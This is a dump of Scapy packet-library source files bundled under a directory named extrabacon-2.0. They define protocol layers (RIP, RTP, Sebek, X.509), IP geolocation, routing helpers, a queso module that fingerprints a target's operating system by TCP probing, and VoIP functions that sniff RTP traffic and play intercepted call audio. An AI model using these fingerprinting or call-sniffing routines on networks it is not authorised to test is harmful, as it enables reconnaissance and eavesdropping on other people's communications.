            p = p[:2]+struct.pack("!H",l)+p[4:]
        return p



## ======== extrabacon-2.0/scapy/layers/rip.py ========
## This file is part of Scapy
## See http://www.secdev.org/projects/scapy for more informations
## Copyright (C) Philippe Biondi
## This program is published under a GPLv2 license

from scapy.packet import *
from scapy.fields import *
from scapy.layers.inet import UDP

class RIP(Packet):
    # RIP message header (UDP/520); route entries follow as a chain of
    # RIPEntry layers.
    name = "RIP header"
    fields_desc = [
        ByteEnumField("cmd",1,{1:"req",2:"resp",3:"traceOn",4:"traceOff",5:"sun",
                               6:"trigReq",7:"trigResp",8:"trigAck",9:"updateReq",
                               10:"updateResp",11:"updateAck"}),
        ByteField("version",1),
        ShortField("null",0),
        ]

class RIPEntry(Packet):
    # One 20-byte route entry.
    name = "RIP entry"
    fields_desc = [
        ShortEnumField("AF",2,{2:"IP"}),
        ShortField("RouteTag",0),
        IPField("addr","0.0.0.0"),
IPField("mask","0.0.0.0"),
        IPField("nextHop","0.0.0.0"),
        IntEnumField("metric",1,{16:"Unreach"}),
        ]



bind_layers( UDP, RIP, sport=520)
bind_layers( UDP, RIP, dport=520)
bind_layers( RIP, RIPEntry, )
bind_layers( RIPEntry, RIPEntry, )   # entries chain until the payload runs out

## ======== extrabacon-2.0/scapy/layers/rtp.py ========
## This file is part of Scapy
## See http://www.secdev.org/projects/scapy for more informations
## Copyright (C) Philippe Biondi
## This program is published under a GPLv2 license

from scapy.packet import *
from scapy.fields import *

# Static RTP payload type numbers -> codec names.
_rtp_payload_types = {
    # http://www.iana.org/assignments/rtp-parameters
    0: 'G.711 PCMU',   3: 'GSM',
    4: 'G723',         5: 'DVI4',
    6: 'DVI4',         7: 'LPC',
    8: 'PCMA',         9: 'G722',
    10: 'L16',         11: 'L16',
    12: 'QCELP',       13: 'CN',
    14: 'MPA',         15: 'G728',
    16: 'DVI4',        17: 'DVI4',
    18: 'G729',        25: 'CelB',
    26: 'JPEG',        28: 'nv',
    31: 'H261',        32: 'MPV',
    33: 'MP2T',        34: 'H263' }

class RTP(Packet):
    # RTP fixed header.  "numsync" (the CSRC count) is derived from the
    # length of "sync" when left None, and drives how many ids are read.
    name="RTP"
    fields_desc = [ BitField('version', 2, 2),
                    BitField('padding', 0, 1),
                    BitField('extension', 0, 1),
                    BitFieldLenField('numsync', None, 4, count_of='sync'),
                    BitField('marker', 0, 1),
                    BitEnumField('payload', 0, 7, _rtp_payload_types),
                    ShortField('sequence', 0),
                    IntField('timestamp', 0),
                    IntField('sourcesync', 0),
                    FieldListField('sync', [], IntField("id",0), count_from=lambda pkt:pkt.numsync) ]

## ======== extrabacon-2.0/scapy/layers/sebek.py ========
## This file is part of Scapy
## See http://www.secdev.org/projects/scapy for more informations
## Copyright (C)
## (continued) Philippe Biondi
## This program is published under a GPLv2 license

from scapy.fields import *
from scapy.packet import *
from scapy.layers.inet import UDP


### SEBEK


class SebekHead(Packet):
    # Common header of Sebek (honeynet data-capture) records, UDP/1101.
    # "version" and "type" select which of the bodies below follows.
    name = "Sebek header"
    fields_desc = [ XIntField("magic", 0xd0d0d0),
                    ShortField("version", 1),
                    ShortEnumField("type", 0, {"read":0, "write":1,
                                             "socket":2, "open":3}),
                    IntField("counter", 0),
                    IntField("time_sec", 0),
                    IntField("time_usec", 0) ]
    def mysummary(self):
        return self.sprintf("Sebek Header v%SebekHead.version% %SebekHead.type%")

# we need this because Sebek headers differ between v1 and v3, and
# between v3 type socket and v3 others

class SebekV1(Packet):
    # v1 record: captured data with its length prefix.
    name = "Sebek v1"
    fields_desc = [ IntField("pid", 0),
                    IntField("uid", 0),
                    IntField("fd", 0),
                    StrFixedLenField("command", "", 12),
                    FieldLenField("data_length", None, "data",fmt="I"),
                    StrLenField("data", "", length_from=lambda x:x.data_length) ]
    def mysummary(self):
        # Prefer the header's version/type when a SebekHead sits below us.
        if isinstance(self.underlayer, SebekHead):
            return self.underlayer.sprintf("Sebek v1 %SebekHead.type% (%SebekV1.command%)")
        else:
            return self.sprintf("Sebek v1 (%SebekV1.command%)")

class SebekV3(Packet):
    # v3 record: v1 plus parent pid and inode.
    name = "Sebek v3"
    fields_desc = [ IntField("parent_pid", 0),
                    IntField("pid", 0),
                    IntField("uid", 0),
                    IntField("fd", 0),
                    IntField("inode", 0),
                    StrFixedLenField("command", "", 12),
                    FieldLenField("data_length", None, "data",fmt="I"),
                    StrLenField("data", "", length_from=lambda x:x.data_length) ]
    def mysummary(self):
        if isinstance(self.underlayer, SebekHead):
            return self.underlayer.sprintf("Sebek v%SebekHead.version% %SebekHead.type% (%SebekV3.command%)")
        else:
            return self.sprintf("Sebek v3 (%SebekV3.command%)")

class SebekV2(SebekV3):
    # v2 shares the v3 layout; only the summary text differs.
    def mysummary(self):
        if isinstance(self.underlayer,
SebekHead):
            return self.underlayer.sprintf("Sebek v%SebekHead.version% %SebekHead.type% (%SebekV2.command%)")
        else:
            return self.sprintf("Sebek v2 (%SebekV2.command%)")

class SebekV3Sock(Packet):
    # v3 "socket" record: instead of captured data it carries the socket
    # call and both endpoints.  The name string says "v2 socket" although
    # this is the v3 class; it is a runtime string and left as found.
    name = "Sebek v2 socket"
    fields_desc = [ IntField("parent_pid", 0),
                    IntField("pid", 0),
                    IntField("uid", 0),
                    IntField("fd", 0),
                    IntField("inode", 0),
                    StrFixedLenField("command", "", 12),
                    IntField("data_length", 15),
                    IPField("dip", "127.0.0.1"),
                    ShortField("dport", 0),
                    IPField("sip", "127.0.0.1"),
                    ShortField("sport", 0),
                    ShortEnumField("call", 0, { "bind":2,
                                                "connect":3, "listen":4,
                                                "accept":5, "sendmsg":16,
                                                "recvmsg":17, "sendto":11,
                                                "recvfrom":12}),
                    ByteEnumField("proto", 0, IP_PROTOS) ]
    def mysummary(self):
        if isinstance(self.underlayer, SebekHead):
            return self.underlayer.sprintf("Sebek v%SebekHead.version% %SebekHead.type% (%SebekV3Sock.command%)")
        else:
            return self.sprintf("Sebek v3 socket (%SebekV3Sock.command%)")

class SebekV2Sock(SebekV3Sock):
    # v2 socket record shares the v3 layout; only the summary differs.
    def mysummary(self):
        if isinstance(self.underlayer, SebekHead):
            return self.underlayer.sprintf("Sebek v%SebekHead.version% %SebekHead.type% (%SebekV2Sock.command%)")
        else:
            return self.sprintf("Sebek v2 socket (%SebekV2Sock.command%)")

# More specific bindings (version + type) are registered before the
# version-only ones so the socket variants win for type=2.
bind_layers( UDP, SebekHead, sport=1101)
bind_layers( UDP, SebekHead, dport=1101)
bind_layers( UDP, SebekHead, dport=1101, sport=1101)
bind_layers( SebekHead, SebekV1, version=1)
bind_layers( SebekHead, SebekV2Sock, version=2, type=2)
bind_layers( SebekHead, SebekV2, version=2)
bind_layers( SebekHead, SebekV3Sock, version=3, type=2)
bind_layers( SebekHead, SebekV3, version=3)

## ======== extrabacon-2.0/scapy/layers/x509.py ========
## This file is part of Scapy
## See http://www.secdev.org/projects/scapy for more informations
## Copyright (C) Philippe Biondi
## This program is published under a GPLv2 license

from scapy.asn1packet import *
from scapy.asn1fields import *

##########
## X509 ##
##########

######[ ASN1 class ]######

class ASN1_Class_X509(ASN1_Class_UNIVERSAL):
    # Context-specific constructed tags [0]..[3] used in the certificate
    # structure (0xa0 = context class | constructed | number 0, ...).
    name="X509"
    CONT0 = 0xa0
    CONT1 = 0xa1
    CONT2 = 0xa2
    CONT3 = 0xa3

# ASN.1 object types for the four context tags.
class ASN1_X509_CONT0(ASN1_SEQUENCE):
    tag = ASN1_Class_X509.CONT0

class ASN1_X509_CONT1(ASN1_SEQUENCE):
    tag = ASN1_Class_X509.CONT1

class ASN1_X509_CONT2(ASN1_SEQUENCE):
    tag = ASN1_Class_X509.CONT2

class ASN1_X509_CONT3(ASN1_SEQUENCE):
    tag = ASN1_Class_X509.CONT3

######[ BER codecs ]#######

# BER encoders/decoders for the same four tags.
class BERcodec_X509_CONT0(BERcodec_SEQUENCE):
    tag = ASN1_Class_X509.CONT0

class BERcodec_X509_CONT1(BERcodec_SEQUENCE):
    tag = ASN1_Class_X509.CONT1

class BERcodec_X509_CONT2(BERcodec_SEQUENCE):
    tag = ASN1_Class_X509.CONT2

class BERcodec_X509_CONT3(BERcodec_SEQUENCE):
    tag = ASN1_Class_X509.CONT3

######[ ASN1 fields ]######

# Packet-field wrappers for the same four tags.
class ASN1F_X509_CONT0(ASN1F_SEQUENCE):
    ASN1_tag = ASN1_Class_X509.CONT0

class ASN1F_X509_CONT1(ASN1F_SEQUENCE):
    ASN1_tag = ASN1_Class_X509.CONT1

class ASN1F_X509_CONT2(ASN1F_SEQUENCE):
    ASN1_tag = ASN1_Class_X509.CONT2

class ASN1F_X509_CONT3(ASN1F_SEQUENCE):
    ASN1_tag = ASN1_Class_X509.CONT3

######[ X509 packets ]######

class X509RDN(ASN1_Packet):
    # One relative distinguished name: a SET holding a single
    # (oid, printable string) attribute; the default OID 2.5.4.6 is
    # countryName.
    ASN1_codec = ASN1_Codecs.BER
    ASN1_root = ASN1F_SET(
        ASN1F_SEQUENCE( ASN1F_OID("oid","2.5.4.6"),
                        ASN1F_PRINTABLE_STRING("value","")
                        )
        )

class X509v3Ext(ASN1_Packet):
    # Placeholder for a v3 extension: a single opaque value.
    ASN1_codec =
ASN1_Codecs.BER
    ASN1_root = ASN1F_field("val",ASN1_NULL(0))


class X509Cert(ASN1_Packet):
    # Simplified X.509 certificate template: tbsCertificate, signature
    # algorithm, signature bit string.  Default OIDs are
    # 1.2.840.113549.1.1.5 (sha1WithRSAEncryption) and
    # 1.2.840.113549.1.1.1 (rsaEncryption).  This class only describes
    # the ASN.1 layout; nothing here validates the signature, the chain
    # or the validity dates.
    ASN1_codec = ASN1_Codecs.BER
    ASN1_root = ASN1F_SEQUENCE(
        ASN1F_SEQUENCE(
            ASN1F_optionnal(ASN1F_X509_CONT0(ASN1F_INTEGER("version",3))),
            ASN1F_INTEGER("sn",1),
            ASN1F_SEQUENCE(ASN1F_OID("sign_algo","1.2.840.113549.1.1.5"),
                           ASN1F_field("sa_value",ASN1_NULL(0))),
            ASN1F_SEQUENCE_OF("issuer",[],X509RDN),
            ASN1F_SEQUENCE(ASN1F_UTC_TIME("not_before",ZuluTime(-600)), # ten minutes ago
                           ASN1F_UTC_TIME("not_after",ZuluTime(+86400))), # for 24h
            ASN1F_SEQUENCE_OF("subject",[],X509RDN),
            ASN1F_SEQUENCE(
                ASN1F_SEQUENCE(ASN1F_OID("pubkey_algo","1.2.840.113549.1.1.1"),
                               ASN1F_field("pk_value",ASN1_NULL(0))),
                ASN1F_BIT_STRING("pubkey","")
                ),
            ASN1F_optionnal(ASN1F_X509_CONT3(ASN1F_SEQUENCE_OF("x509v3ext",[],X509v3Ext))),

            ),
        ASN1F_SEQUENCE(ASN1F_OID("sign_algo2","1.2.840.113549.1.1.5"),
                       ASN1F_field("sa2_value",ASN1_NULL(0))),
        ASN1F_BIT_STRING("signature","")
        )




## ======== extrabacon-2.0/scapy/modules/__init__.py ========
## This file is part of Scapy
## See http://www.secdev.org/projects/scapy for more informations
## Copyright (C) Philippe Biondi
## This program is published under a GPLv2 license

## ======== extrabacon-2.0/scapy/modules/geoip.py ========
## This file is part of Scapy
## See http://www.secdev.org/projects/scapy for more informations
## Copyright (C) Philippe Biondi
## This program is published under a GPLv2 license

from scapy.data import KnowledgeBase
from scapy.config import conf

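conf.IPCountry_base = "GeoIPCountry4Scapy.gz"
conf.countryLoc_base = "countryLoc.csv"
conf.gnuplot_world = "world.dat"


##########################
## IP location database ##
##########################

class IPCountryKnowledgeBase(KnowledgeBase):
    """Sorted list of (start, end, country) IPv4 ranges, loaded lazily.

    How to generate the base :
    db = []
    for l in open("GeoIPCountryWhois.csv").readlines():
        s,e,c = l.split(",")[2:5]
        db.append((int(s[1:-1]),int(e[1:-1]),c[1:-1]))
    cPickle.dump(db, gzip.open("xxx","w"))   # dump(obj, file) -- the old recipe had them swapped

    The base is a pickle and unpickling executes whatever the file
    contains, so only point conf.IPCountry_base at a file you generated
    yourself.
    """
    def lazy_init(self):
        # NOTE(review): load_object is not imported by this module's visible
        # import lines; presumably scapy.utils.load_object -- confirm.
        self.base = load_object(self.filename)


class CountryLocKnowledgeBase(KnowledgeBase):
    """Maps a country code to its (longitude, latitude) pair.

    The backing file is a CSV with exactly three fields per line,
    ``country,lat,long``; lines with any other field count are skipped.
    """
    def lazy_init(self):
        # Open first so a missing file leaves self.base untouched, as before;
        # ``with`` closes the file even if float() raises on a bad line.
        with open(self.filename) as f:
            self.base = {}
            for raw in f:
                fields = raw.strip().split(",")
                if len(fields) != 3:
                    continue
                country, lat, lon = fields
                # Stored as (longitude, latitude): note the swap w.r.t. the file.
                self.base[country] = (float(lon), float(lat))



@conf.commands.register
def locate_ip(ip):
    """Get geographic coordinates from IP using geoip database.

    :param ip: dotted-quad IPv4 address string, e.g. "192.0.2.1"
    :returns: the (longitude, latitude) tuple recorded for the country
        owning *ip*, or None when no range covers the address, the
        country has no location entry, or either base is unavailable
    :raises ValueError: if *ip* is not four dot-separated integers
    """
    octets = [int(o) for o in ip.split(".")]
    if len(octets) != 4:
        raise ValueError("locate_ip: expected a dotted-quad IPv4 address, got %r" % (ip,))
    ip_int = (octets[0] << 24) | (octets[1] << 16) | (octets[2] << 8) | octets[3]

    # Both bases are attached to ``conf`` at the bottom of this module; the
    # bare names used previously were never defined (NameError).
    cloc = conf.country_loc_kdb.get_base()
    db = conf.IP_country_kdb.get_base()
    if not db or not cloc:
        return None

    # Binary search for the bracket [lo, hi] around ip_int in the sorted
    # (start, end, country) list.
    lo, hi = 0, len(db) - 1
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if ip_int > db[mid][0]:
            lo = mid
        else:
            hi = mid
    # The address may fall in either bracket entry (hi when it equals that
    # entry's start, lo otherwise); the old code only tested the last
    # probed index and so missed valid hits.
    for start, end, country in (db[hi], db[lo]):
        if start <= ip_int <= end:
            return cloc.get(country, None)
    return None





conf.IP_country_kdb = IPCountryKnowledgeBase(conf.IPCountry_base)
conf.country_loc_kdb = CountryLocKnowledgeBase(conf.countryLoc_base)
-------------------------------------------------------------------------------- /extrabacon-2.0/scapy/modules/queso.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ##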
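This program is published under a GPLv2 license

from scapy.data import KnowledgeBase
from scapy.config import conf
from scapy.layers.inet import IP,TCP
# sr(), RandInt() and warning() were used below without ever being imported.
from scapy.sendrecv import sr
from scapy.volatile import RandInt
from scapy.error import warning

conf.queso_base ="/etc/queso.conf"


#################
## Queso stuff ##
#################


def quesoTCPflags(flags):
    """Translate a queso TCP flag string into the hex bitmask queso uses.

    "-" (no flags) is returned unchanged. Every letter of *flags* sets the
    bit at its index in "FSRPAUXY"; an unknown letter raises ValueError.
    """
    if flags == "-":
        return "-"
    letters = "FSRPAUXY"
    mask = 0
    for ch in flags:
        mask |= 1 << letters.index(ch)
    return "%x" % mask

class QuesoKnowledgeBase(KnowledgeBase):
    """Loads a queso OS-fingerprint file into a nested-dict trie.

    File format: lines starting with ';' are comments; "*<name>" opens a
    new OS entry; a line whose first character is a digit 0-6 is the
    signature for one probe (the columns after the 2-character prefix,
    with the last column normalised through quesoTCPflags()). Each
    signature descends one trie level and the OS name is stored under
    the "" key of the final node.
    """
    def lazy_init(self):
        try:
            f = open(self.filename)
        except IOError:
            # No database file: leave self.base as it was.
            return
        base = {}
        node = None
        name = None
        try:
            with f:
                for raw in f:
                    line = raw.strip()
                    if not line or line[0] == ';':
                        continue
                    if line[0] == '*':
                        if node is not None:
                            node[""] = name
                        name = line[1:].strip()
                        node = base
                        continue
                    if line[0] not in "0123456":
                        continue
                    if node is None:
                        # Signature before the first "*name" header: ignore.
                        continue
                    cols = line[2:].split()
                    cols[-1] = quesoTCPflags(cols[-1])
                    node = node.setdefault(" ".join(cols), {})
                if node is not None:
                    node[""] = name
        except Exception:
            # A malformed line (bad flag letter, empty signature, ...)
            # invalidates the whole base rather than leaving a partial trie.
            self.base = None
            warning("Can't load queso base [%s]" % self.filename)
            return
        self.base = base


queso_kdb = QuesoKnowledgeBase(conf.queso_base)


def queso_sig(target, dport=80, timeout=3):
    """Send queso's seven TCP probes to *target*:*dport* and return the
    seven response signatures, in probe order.

    A signature is "<seq!=0> <ack relative to our seq> <window hex> <flags hex>";
    "- - - -" is recorded when no answer arrives within *timeout* seconds.
    """
    ret = []
    for flags in ["S", "SA", "F", "FA", "SF", "P", "SEC"]:
        ans, unans = sr(IP(dst=target)/TCP(dport=dport,flags=flags,seq=RandInt()),
                        timeout=timeout, verbose=0)
        if not ans:
            ret.append("- - - -")
            continue
        s, r = ans[0]
        rs = "%i" % (r.seq != 0)
        if not r.ack:
            rs += " 0"          # was `r += " 0"`: appended to the packet, not the signature
        elif r.ack - s.seq > 666:
            rs += " R"          # was `" R" % 0`, which raises TypeError
        else:
            rs += " +%i" % (r.ack - s.seq)
        rs += " %X" % r.window
        rs += " %x" % r.payload.flags
        ret.append(rs)
    return ret

def queso_search(sig):
    """Walk the queso trie along *sig* and return every OS name met on the
    way (most specific last); stops at the first unknown signature.

    *sig* is no longer consumed: the previous version reversed and popped
    the caller's list in place.
    """
    node = queso_kdb.get_base()
    ret = []
    if node is None:
        return ret
    for s in sig:
        node = node.get(s)
        if node is None:
            break
        if "" in node:
            ret.append(node[""])
    return ret


@conf.commands.register
def queso(*args,**kargs):
    """Queso OS fingerprinting
    queso(target, dport=80, timeout=3)"""
    return queso_search(queso_sig(*args, **kargs))
-------------------------------------------------------------------------------- /extrabacon-2.0/scapy/modules/voip.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | import os 7 | ################### 8 | ## Testing stuff ## 9 | ################### 10 | 11 | from fcntl import fcntl 12 | from scapy.sendrecv import sniff 13 | from scapy.packet import Raw 14 | from scapy.layers.inet import IP,UDP 15 | from scapy.layers.rtp import RTP 16 | from scapy.utils import get_temp_file 17 | 18 | 19 | def merge(x,y,sample_size=2): 20 | if len(x) > len(y): 21 | y += "\x00"*(len(x)-len(y)) 22 | elif len(x) < len(y): 23 | x += "\x00"*(len(y)-len(x)) 24 | m = "" 25 | ss=sample_size 26 | for i in range(len(x)/ss): 27 | m += x[ss*i:ss*(i+1)]+y[ss*i:ss*(i+1)] 28 | return m 29 | # return "".join(map(str.__add__, x, y)) 30 | 31 | 32 | def voip_play(s1,list=None,**kargs): 33 | FIFO=get_temp_file() 34 | FIFO1=FIFO % 1 35 | FIFO2=FIFO % 2 36 | 37 | os.mkfifo(FIFO1) 38 | os.mkfifo(FIFO2) 39 | try: 40 | os.system("soxmix -t .ul %s -t .ul %s -t ossdsp /dev/dsp &" % (FIFO1,FIFO2)) 41 | 42 | c1=open(FIFO1,"w", 4096) 43 | c2=open(FIFO2,"w", 4096) 44 | fcntl.fcntl(c1.fileno(),fcntl.F_SETFL, os.O_NONBLOCK) 45 | fcntl.fcntl(c2.fileno(),fcntl.F_SETFL, os.O_NONBLOCK) 46 | 47 | # dsp,rd = os.popen2("sox -t .ul -c 2 - -t ossdsp /dev/dsp") 48 | def play(pkt,last=[]): 49 | if not pkt: 50 | return 51 | if not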
pkt.haslayer(UDP): 52 | return 53 | ip=pkt.getlayer(IP) 54 | if s1 in [ip.src, ip.dst]: 55 | if not last: 56 | last.append(pkt) 57 | return 58 | load=last.pop() 59 | # x1 = load.load[12:] 60 | c1.write(load.load[12:]) 61 | if load.getlayer(IP).src == ip.src: 62 | # x2 = "" 63 | c2.write("\x00"*len(load.load[12:])) 64 | last.append(pkt) 65 | else: 66 | # x2 = pkt.load[:12] 67 | c2.write(pkt.load[12:]) 68 | # dsp.write(merge(x1,x2)) 69 | 70 | if list is None: 71 | sniff(store=0, prn=play, **kargs) 72 | else: 73 | for p in list: 74 | play(p) 75 | finally: 76 | os.unlink(FIFO1) 77 | os.unlink(FIFO2) 78 | 79 | 80 | 81 | def voip_play1(s1,list=None,**kargs): 82 | 83 | 84 | dsp,rd = os.popen2("sox -t .ul - -t ossdsp /dev/dsp") 85 | def play(pkt): 86 | if not pkt: 87 | return 88 | if not pkt.haslayer(UDP): 89 | return 90 | ip=pkt.getlayer(IP) 91 | if s1 in [ip.src, ip.dst]: 92 | dsp.write(pkt.getlayer(Raw).load[12:]) 93 | try: 94 | if list is None: 95 | sniff(store=0, prn=play, **kargs) 96 | else: 97 | for p in list: 98 | play(p) 99 | finally: 100 | dsp.close() 101 | rd.close() 102 | 103 | def voip_play2(s1,**kargs): 104 | dsp,rd = os.popen2("sox -t .ul -c 2 - -t ossdsp /dev/dsp") 105 | def play(pkt,last=[]): 106 | if not pkt: 107 | return 108 | if not pkt.haslayer(UDP): 109 | return 110 | ip=pkt.getlayer(IP) 111 | if s1 in [ip.src, ip.dst]: 112 | if not last: 113 | last.append(pkt) 114 | return 115 | load=last.pop() 116 | x1 = load.load[12:] 117 | # c1.write(load.load[12:]) 118 | if load.getlayer(IP).src == ip.src: 119 | x2 = "" 120 | # c2.write("\x00"*len(load.load[12:])) 121 | last.append(pkt) 122 | else: 123 | x2 = pkt.load[:12] 124 | # c2.write(pkt.load[12:]) 125 | dsp.write(merge(x1,x2)) 126 | 127 | sniff(store=0, prn=play, **kargs) 128 | 129 | def voip_play3(lst=None,**kargs): 130 | dsp,rd = os.popen2("sox -t .ul - -t ossdsp /dev/dsp") 131 | try: 132 | def play(pkt, dsp=dsp): 133 | if pkt and pkt.haslayer(UDP) and pkt.haslayer(Raw): 134 | 
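dsp.write(pkt.getlayer(RTP).load) 135 | if lst is None: 136 | sniff(store=0, prn=play, **kargs) 137 | else: 138 | for p in lst: 139 | play(p) 140 | finally: 141 | try: 142 | dsp.close() 143 | rd.close() 144 | except: 145 | pass 146 | 147 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/pton_ntop.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 |


import socket,struct

# These functions are missing when python is compiled
# without IPv6 support, on Windows for instance

_HEXDIGITS = "0123456789abcdefABCDEF"


def _pack_ipv6_groups(parts, ipv4_last):
    """Pack textual 16-bit groups into bytes.

    :param parts: list of hex groups (1-4 hex digits each)
    :param ipv4_last: when true, a final group containing "." is taken as
        an embedded dotted-quad IPv4 address standing for the last two groups
    :returns: the concatenated big-endian bytes
    :raises Exception: "Illegal syntax for IP address" on any malformed group
    """
    pieces = []
    last = len(parts) - 1
    for i, part in enumerate(parts):
        if ipv4_last and i == last and "." in part:
            # inet_aton accepts short forms like "1.2.3"; insist on 4 octets.
            if part.count(".") != 3:
                raise Exception("Illegal syntax for IP address")
            pieces.append(socket.inet_aton(part))
        elif 1 <= len(part) <= 4 and all(c in _HEXDIGITS for c in part):
            pieces.append(struct.pack("!H", int(part, 16)))
        else:
            raise Exception("Illegal syntax for IP address")
    return b"".join(pieces)


def inet_pton(af, addr):
    """Convert an IP address from text representation into binary form.

    :param af: socket.AF_INET or socket.AF_INET6
    :param addr: textual address; for AF_INET6 a single "::" may stand for
        one or more zero groups and the last group may be a dotted IPv4
    :returns: packed address, 4 bytes for AF_INET and 16 for AF_INET6
    :raises Exception: "Illegal syntax for IP address" for malformed input,
        "Address family not supported" for any other *af*
    """
    if af == socket.AF_INET:
        # Was a bare inet_aton(), which this module never defines.
        return socket.inet_aton(addr)
    if af != socket.AF_INET6:
        raise Exception("Address family not supported")

    if "::" in addr:
        head, _, tail = addr.partition("::")
        if "::" in tail:
            # The wildcard is only allowed once.
            raise Exception("Illegal syntax for IP address")
        head_parts = head.split(":") if head else []
        tail_parts = tail.split(":") if tail else []
        packed_head = _pack_ipv6_groups(head_parts, False)
        packed_tail = _pack_ipv6_groups(tail_parts, True)
        fill = 16 - len(packed_head) - len(packed_tail)
        if fill < 2:
            # "::" must represent at least one 16-bit group.
            raise Exception("Illegal syntax for IP address")
        result = packed_head + b"\x00" * fill + packed_tail
    else:
        result = _pack_ipv6_groups(addr.split(":"), True)

    if len(result) != 16:
        raise Exception("Illegal syntax for IP address")
    return result


def inet_ntop(af, addr):
    """Convert an IP address from binary form into text representation.

    For AF_INET6 the output follows RFC 5952: lowercase hex, no leading
    zeros, and only the longest run of two or more zero groups (the first
    one on a tie) is collapsed to "::". The previous version collapsed
    single zero groups and could emit several "::" in one address.

    :param af: socket.AF_INET or socket.AF_INET6
    :param addr: 4 (AF_INET) or 16 (AF_INET6) packed bytes
    :raises Exception: "Illegal syntax for IP address" when *addr* is not
        16 bytes for AF_INET6, "Address family not supported yet" otherwise
    """
    if af == socket.AF_INET:
        # Was a bare inet_ntoa(), which this module never defines.
        return socket.inet_ntoa(addr)
    if af != socket.AF_INET6:
        raise Exception("Address family not supported yet")

    # IPv6 addresses have 128bits (16 bytes)
    if len(addr) != 16:
        raise Exception("Illegal syntax for IP address")
    try:
        groups = struct.unpack("!8H", addr)
    except (TypeError, struct.error):
        raise Exception("Illegal syntax for IP address")

    # Locate the longest run of zero groups.
    best_start, best_len = -1, 0
    run_start, run_len = -1, 0
    for i, g in enumerate(groups):
        if g != 0:
            run_len = 0
            continue
        if run_len == 0:
            run_start = i
        run_len += 1
        if run_len > best_len:
            best_start, best_len = run_start, run_len

    hexs = ["%x" % g for g in groups]
    if best_len < 2:
        return ":".join(hexs)
    left = ":".join(hexs[:best_start])
    right = ":".join(hexs[best_start + best_len:])
    return left + "::" + right
-------------------------------------------------------------------------------- /extrabacon-2.0/scapy/route.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | import socket 7 | from arch import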
read_routes,get_if_addr,LOOPBACK_NAME 8 | from utils import atol,ltoa,itom 9 | from config import conf 10 | from error import Scapy_Exception,warning 11 | 12 | ############################## 13 | ## Routing/Interfaces stuff ## 14 | ############################## 15 | 16 | class Route: 17 | def __init__(self): 18 | self.resync() 19 | self.s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 20 | self.cache = {} 21 | 22 | def invalidate_cache(self): 23 | self.cache = {} 24 | 25 | def resync(self): 26 | self.invalidate_cache() 27 | self.routes = read_routes() 28 | 29 | def __repr__(self): 30 | rt = "Network Netmask Gateway Iface Output IP\n" 31 | for net,msk,gw,iface,addr in self.routes: 32 | rt += "%-15s %-15s %-15s %-15s %-15s\n" % (ltoa(net), 33 | ltoa(msk), 34 | gw, 35 | iface, 36 | addr) 37 | return rt 38 | 39 | def make_route(self, host=None, net=None, gw=None, dev=None): 40 | if host is not None: 41 | thenet,msk = host,32 42 | elif net is not None: 43 | thenet,msk = net.split("/") 44 | msk = int(msk) 45 | else: 46 | raise Scapy_Exception("make_route: Incorrect parameters. 
You should specify a host or a net") 47 | if gw is None: 48 | gw="0.0.0.0" 49 | if dev is None: 50 | if gw: 51 | nhop = gw 52 | else: 53 | nhop = thenet 54 | dev,ifaddr,x = self.route(nhop) 55 | else: 56 | ifaddr = get_if_addr(dev) 57 | return (atol(thenet), itom(msk), gw, dev, ifaddr) 58 | 59 | def add(self, *args, **kargs): 60 | """Ex: 61 | add(net="192.168.1.0/24",gw="1.2.3.4") 62 | """ 63 | self.invalidate_cache() 64 | self.routes.append(self.make_route(*args,**kargs)) 65 | 66 | 67 | def delt(self, *args, **kargs): 68 | """delt(host|net, gw|dev)""" 69 | self.invalidate_cache() 70 | route = self.make_route(*args,**kargs) 71 | try: 72 | i=self.routes.index(route) 73 | del(self.routes[i]) 74 | except ValueError: 75 | warning("no matching route found") 76 | 77 | def ifchange(self, iff, addr): 78 | self.invalidate_cache() 79 | the_addr,the_msk = (addr.split("/")+["32"])[:2] 80 | the_msk = itom(int(the_msk)) 81 | the_rawaddr = atol(the_addr) 82 | the_net = the_rawaddr & the_msk 83 | 84 | 85 | for i in range(len(self.routes)): 86 | net,msk,gw,iface,addr = self.routes[i] 87 | if iface != iff: 88 | continue 89 | if gw == '0.0.0.0': 90 | self.routes[i] = (the_net,the_msk,gw,iface,the_addr) 91 | else: 92 | self.routes[i] = (net,msk,gw,iface,the_addr) 93 | conf.netcache.flush() 94 | 95 | 96 | 97 | def ifdel(self, iff): 98 | self.invalidate_cache() 99 | new_routes=[] 100 | for rt in self.routes: 101 | if rt[3] != iff: 102 | new_routes.append(rt) 103 | self.routes=new_routes 104 | 105 | def ifadd(self, iff, addr): 106 | self.invalidate_cache() 107 | the_addr,the_msk = (addr.split("/")+["32"])[:2] 108 | the_msk = itom(int(the_msk)) 109 | the_rawaddr = atol(the_addr) 110 | the_net = the_rawaddr & the_msk 111 | self.routes.append((the_net,the_msk,'0.0.0.0',iff,the_addr)) 112 | 113 | 114 | def route(self,dest,verbose=None): 115 | if type(dest) is list and dest: 116 | dest = dest[0] 117 | if dest in self.cache: 118 | return self.cache[dest] 119 | if verbose is None: 120 | 
